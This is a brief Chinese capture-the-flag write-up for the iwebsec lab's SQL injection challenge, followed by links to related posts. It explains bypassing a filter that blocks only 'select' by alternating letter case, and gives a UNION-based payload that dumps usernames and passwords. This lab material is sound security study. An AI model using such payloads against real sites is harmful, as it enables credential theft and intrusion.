一、解题过程

将SQL关键都换成大小写交替，最后经查看源码，本题只过滤了select

?id=-1 Union Select 1,2,Group_concat(concat(username,0x7e,password)) From iwebsec.users

在这里插入图片描述

相关推荐
荷一居茶生活
 CTF学习笔记6：iwebsec-SQL注入漏洞-03-sleep注入
荷一居茶生活 77 0 0
无愠色
 iwebsec靶场 SQL注入漏洞通关笔记13-二次注入
无愠色 224 0 0
独西楼Q
 SQL注入漏洞-学习笔记
独西楼Q 137 0 0
文风起武
 java学习笔记：文件名区分大小写
文风起武 92 0 0
晚熟的猫
 CTF学习笔记20：iwebsec-文件上传漏洞-05-.htaccess文件上传
晚熟的猫 68 0 0
幺幺零
 前端学习笔记202304学习笔记第六天-props的大小写命名
幺幺零 29 0 0
RockYoungTalk
 【Web】基于Mybatis的SQL注入漏洞利用点学习笔记
RockYoungTalk 25 0 0
老罗话编程
 openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause
老罗话编程 9 0 0
九点韶留学
 java202302java学习笔记第十一天-开发验证码1添加大小写字母
九点韶留学 49 0 0

精彩评论（0）